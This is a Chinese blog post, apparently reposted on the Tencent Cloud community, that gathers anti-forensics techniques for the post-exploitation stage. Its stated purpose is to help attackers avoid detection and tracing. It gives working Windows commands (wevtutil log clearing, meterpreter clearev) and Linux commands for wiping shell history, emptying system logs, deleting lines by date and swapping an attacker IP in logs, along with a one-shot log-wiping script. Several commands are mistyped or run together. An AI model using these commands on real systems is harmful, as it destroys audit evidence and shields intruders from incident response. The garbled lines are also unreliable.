后渗透阶段清理痕迹方式总结
后渗透阶段清理痕迹方式总结
Power7089
发布于 2021-04-16 14:59:45
发布于 2021-04-16 14:59:45
代码可运行
运行总次数:0
代码可运行
作者:Leticia 文章来源:Leticia‘s Blog
一、前言
在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文分别对windows和linux上清理痕迹的方式做一个总结。
二、windows
有远程桌面权限时手动删除日志:
开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志wevtutil:
wevtutil el 列出系统中所有日志名称wevtutil cl system 清理系统日志wevtutil cl application 清理应用程序日志wevtutil cl security 清理安全日志meterperter自带清除日志功能:
clearev 清除windows中的应用程序日志、系统日志、安全日志清除recent:
在文件资源管理器中点击“查看”->“选项”->在常规->隐私中点击”清除”按钮
或直接打开C:\Users\Administrator\Recent并删除所有内容
或在命令行中输入del /f /s /q “%userprofile%\Recent*.*
三、linux
清除命令历史记录
histroy -r #删除当前会话历史记录history -c #删除内存中的所有命令历史rm .bash_history #删除历史文件中的内容HISTZISE=0 #通过设置历史命令条数来清除所有历史记录在隐蔽的位置执行命令
使用vim打开文件执行命令
:set history=0:!commandlinux日志文件
/var/run/utmp 记录现在登入的用户/var/log/wtmp 记录用户所有的登入和登出/var/log/lastlog 记录每一个用户最后登入时间/var/log/btmp 记录错误的登入尝试/var/log/auth.log 需要身份确认的操作/var/log/secure 记录安全相关的日志信息/var/log/maillog 记录邮件相关的日志信息/var/log/message 记录系统启动后的信息和错误日志/var/log/cron 记录定时任务相关的日志信息/var/log/spooler 记录UUCP和news设备相关的日志信息/var/log/boot.log 记录守护进程启动和停止相关的日志消息完全删除日志文件:
cat /dev/null > filename: > filename> filenameecho "" > filenameecho > filename针对性删除日志文件:
删除当天日志sed -i '/当天日期/'d filename篡改日志文件:
将所有170.170.64.17ip替换为127.0.0.1sed -i 's/170.170.64.17/127.0.0.1/g'一键清除脚本:
#!/usr/bin/bashecho > /var/log/syslogecho > /var/log/messagesecho > /var/log/httpd/access_logecho > /var/log/httpd/error_logecho > /var/log/xferlogecho > /var/log/secureecho > /var/log/auth.logecho > /var/log/user.logecho > /var/log/wtmpecho > /var/log/lastlogecho > /var/log/btmpecho > /var/run/utmprm ~/./bash_historyhistory -c版权申明:内容来源网络,版权归原创者所有。除非无法确认,都会标明作者及出处,如有侵权烦请告知,我们会立即删除并致歉。谢谢!
↑↑↑长按图片识别二维码关註↑↑↑本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-04-08,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
